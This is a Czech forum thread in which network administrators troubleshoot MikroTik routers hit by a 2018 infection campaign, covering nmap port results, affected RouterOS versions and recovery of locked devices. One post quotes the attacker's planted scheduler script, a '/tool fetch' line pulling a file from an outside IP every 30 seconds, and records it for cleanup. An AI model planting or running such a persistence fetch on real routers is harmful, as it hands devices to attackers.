MikroTik - BEZPECNOSTNI UPOZORNENI !!! DULEZITE - zablokovane MikroTiky

Návody a problémy s konfigurací.
mpcz
Příspěvky: 2034
Registrován: 12 years ago

Re: MikroTik - BEZPECNOSTNI UPOZORNENI !!! DULEZITE - zablokovane MikroTiky

Příspěvekod mpcz » 1 month ago

Na některé stroje jdu přímo a přesto ten port 8266 vidím (polo)aktivní. mpcz, 15.7.2018
0 x

mpcz
Příspěvky: 2034
Registrován: 12 years ago

Příspěvekod mpcz » 1 month ago

PORT STATE SERVICE
8266/tcp filtered unknown
A co si vlastně mám pod tímto sdělením NMAPu představit konkrétně? Dík, mpcz, 15.7.2018
0 x

helapc
Příspěvky: 779
Registrován: 7 years ago

Příspěvekod helapc » 1 month ago

Port je aktivní, ale blokováný firewallem
0 x

iTomB
Příspěvky: 668
Registrován: 12 years ago

Příspěvekod iTomB » 1 month ago

tak si zkuste jakykoliv nahodny port a dostanete stejnou odpoved. Co znamena polofunkcni fakt nevim. Pripadne si dej pred ten router LOGovani provozu na danem portu.

Ja bych to zavrel jako plany poplach a nepochopeni hlasky z nmapu.
0 x

mpcz
Příspěvky: 2034
Registrován: 12 years ago

Příspěvekod mpcz » 1 month ago

No to je samozřejmě taky možné, ale pamatuj také na toho operátora radaru, co viděl hejno hus a bylo to 353 bombardérů. Takže bych tomu planému poplachu rád přišel na kloub. Proč? Protože když oscanuji IP na všechny porty, dostanu:

Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-15 18:07 Stoední Evropa (letní eas)
Nmap scan report for xxx.xxx.xxx.xx
Host is up (0.0061s latency).
Not shown: 65525 closed ports
PORT STATE SERVICE
53/tcp open domain
1222/tcp filtered nerv
1723/tcp open pptp
2000/tcp open cisco-sccp
8080/tcp filtered http-proxy
8266/tcp filtered unknown
30115/tcp filtered unknown
Když oscanuji jen konkrétní port 8266, dostanu to výše, 8265 - closed, 8267 - closed.
mpcz, 15.7.2018
0 x

Uživatelský avatar
Myghael
Příspěvky: 1037
Registrován: 6 years ago

Příspěvekod Myghael » 1 month ago

Rozdíl je opravdu prostý - v jednom případě se ten packet na firewallu, ať už na zařízení nebo po cestě, prostě zahodí (odfiltruje), v druhém dojde až na zařízení, které spojení aktivně odmítne (protože je zavřeno).
0 x
Si vis pacem, para bellum.

MikroTik, UBNT, Cisco, TP-Link... rozhoduje vhodnost toho či onoho pro konkrétní použití, ne jaké logo nalepili v Číně na krabici. Na tomto fóru vystupuji jen a pouze sám za sebe.

mpcz
Příspěvky: 2034
Registrován: 12 years ago

Příspěvekod mpcz » 1 month ago

No to je možné, ale:
1/ dá se z toho vyvodit, že někdo/něco operuje aktivně s tímto portem?
2/ protože si nejsem vědom změn v konfiguraci z mé strany, jak přijít na to, co to způsobuje? Podotýkám, že tento port není nikde v internetu evidován jako používaný standard, vyjma textové podobnosti názvu s modulem ESP8266 pro wifi. Dík, mpcz, 15.7.2018
0 x

Uživatelský avatar
hapi
Příspěvky: 11291
Registrován: 11 years ago
Kontaktovat uživatele:

Příspěvekod hapi » 1 month ago

nemáš tam náhodou action=reject?
0 x

mpcz
Příspěvky: 2034
Registrován: 12 years ago

Příspěvekod mpcz » 1 month ago

Nemám. mpcz, 15.7.2018
0 x

Uživatelský avatar
3com
Příspěvky: 515
Registrován: 7 years ago

Příspěvekod 3com » 3 weeks ago

Neví někdo na jaký Login a Heslo to ta havět mění?
0 x

mpcz
Příspěvky: 2034
Registrován: 12 years ago

Příspěvekod mpcz » 3 weeks ago

Už jsi to odepl od napájení? Změnila se verze ROS? mpcz, 23.7.2018
0 x

CrazyApe
Příspěvky: 509
Registrován: 3 years ago

Příspěvekod CrazyApe » 3 weeks ago

Je už nějaká bezpečná verze prosim? Zatím jsme bez napadeni tuk tuk tuk ale nechce se mi to vše upgradovat 10x
0 x

Uživatelský avatar
3com
Příspěvky: 515
Registrován: 7 years ago

Příspěvekod 3com » 3 weeks ago

U nás byl klid všechny MK při začátku této kauzy updatovány na 6.41.3/6.42.2. A nikde nic napadeno nebylo do včerejšího dne... Včera během jednoho dne se to zničeho nic dostalo do několika stovek MK.

- infikované jsou pouze stroje s veřejnou IP a nevyplněnou položkou našich IP rozsahů v IP-Services (Winbox s default portem 8291). Pokud je port jiný tam se to nikde nedostalo. Všechny ostatní položky v IP-services jsme měly vždy Disable (SSH,Telnet,WWW atd).. Takže to tam muselo přijit jedině přes Winbox/Dude (dle logu).
- a jsou dva případy infekce:
1. Ten lepší co jde vyřešit na dálku:
- Ve Files je soubor Mikrotik.php (nic nezabírá je úplně prázdný ani políčko textu), dle všeho jen pro otestování viru jestli se tam podaří nahrát soubor.
- V Script list je polozka script1_ v kterém je řádek: /tool fetch address=95.154.216.160 port=2008 src-path=/mikrotik.php mode=http
- V Scheduleru je položka schedule1_ ,která každých 30sekund spouští script viz. výše.
vir.png
vir.png (222.91 KiB) Zobrazeno 247 x

Všechny tyto RB jsou bez restartu s uptimem desítky dní, nic jiného se tam nezměnilo, stačí to ručně smazat a vyplnit IP-Services + upgrade na 6.42.5 a je vyřešeno.

2. Ten horší případ:
Změněný Login a Heslo. Na dálku netuším jak vyřešit.... RB funguje jak má i s uptimem desítek dní, ale hotovo... bez získání hesla asi nezbyde nic jiného než Netinstall na místě nebo Fyzický reset a pak update FW a nová konfigurace... Port to nijak nezměnilo, protože piše špatný login i přes MacTelnet.
0 x

mpcz
Příspěvky: 2034
Registrován: 12 years ago

Příspěvekod mpcz » 3 weeks ago

Co to je prosím dle logu? Podle Sergeje je chyba ve www a winboxu opravena již dříve, než ty tvoje verze. Při těch stovkách strojů nebyla ani jedna 6.42.5? Nezískal někde někdo heslo, které bylo společné? A pak třeba vlezl po MAC do těch strojů s bezpečnou verzí? V logu není zalogováný žádný login? Bylo určtě blokováno WWW na všech portech?
Pokud máš zablokované stroje heslem, neklesej na mysli, není to takový problém, jak to z počátku vypadá. Kolik jich asi tak je? Pokud samozřejmě vir nezmutoval. mpcz, 23.7.2018
0 x

Uživatelský avatar
hapi
Příspěvky: 11291
Registrován: 11 years ago
Kontaktovat uživatele:

Příspěvekod hapi » 3 weeks ago

[quote="3com"][/quote]

pokud to resetneš tlačítkem tak by se měl vytvořit backup na disku a ten pak jenom obnovit ale nejsem si jistej. Napadlo to i ty 6.42.x nebo ne? nějak to není z postu zřejmý. Otázkou je, jestli si z 6.41 nevzali hesla a nepoužili je do nových verzí kde sice heslo nevytahnou ale použijou ho pro uploadování kodu za pomocí hesla což už bych věřil že půjde.
0 x


Zpět na „Konfigurace“

Kdo je online

Uživatelé prohlížející si toto fórum: Žádní registrovaní uživatelé a 9 hostů